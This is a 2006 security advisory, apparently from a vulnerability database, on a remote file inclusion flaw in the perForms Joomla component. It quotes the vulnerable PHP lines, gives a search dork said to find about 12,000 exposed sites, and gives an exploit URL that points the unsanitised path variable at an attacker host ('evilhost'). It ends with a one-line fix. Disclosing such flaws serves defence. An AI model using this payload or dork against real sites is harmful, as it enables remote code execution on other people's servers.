Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13524
HistoryJul 14, 2006 - 12:00 a.m.

perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion

2006-07-1400:00:00
vulners.com
526

perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion

Remote : Yes
Critical Level : High

Vuln founded in a log file: lazy 0day!!! :D

Description:


Application :  perForms Joomla Component
Version : latest version [1.0]
URL : http://forge.joomla.org/sf/projects/performs

Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on 

in /components/com_performs/com_performs/performs.php on lines 6-10

require_once&#40; $mosConfig_absolute_path.&quot;/administrator/components/com_performs/lib/lib_template.php&quot;
&#41;;
require_once&#40; $mosConfig_absolute_path.&quot;/administrator/components/com_performs/lib/lib_valid.php&quot; &#41;;
require_once&#40; $mosConfig_absolute_path.&quot;/administrator/components/com_performs/lib/lib_phpForm.php&quot; &#41;;
require_once&#40; $mosConfig_absolute_path.&quot;/administrator/components/com_performs/lib/myLib.php&quot; &#41;;
require_once&#40;$mosConfig_absolute_path.&quot;/administrator/components/com_performs/class.performs.php&quot;&#41;;


Exploit:
~~~~~~~~

dork: inurl:&quot;com_performs&quot; -&gt; founds ~12.000 sites &#40;!&#41;

http://www.vuln.com/components/com_performs/performs.php?mosConfig_absolute_path=http://evilhost


Fix
~~~~

Add before code:

defined&#40;&#39;_VALID_MOS&#39;&#41; or die&#40;&#39;Direct access to this location is not allowed.&#39;&#41;;


Thx
~~~~

Who works for better code and better life!


----------------------------------------------------------------------------------------------------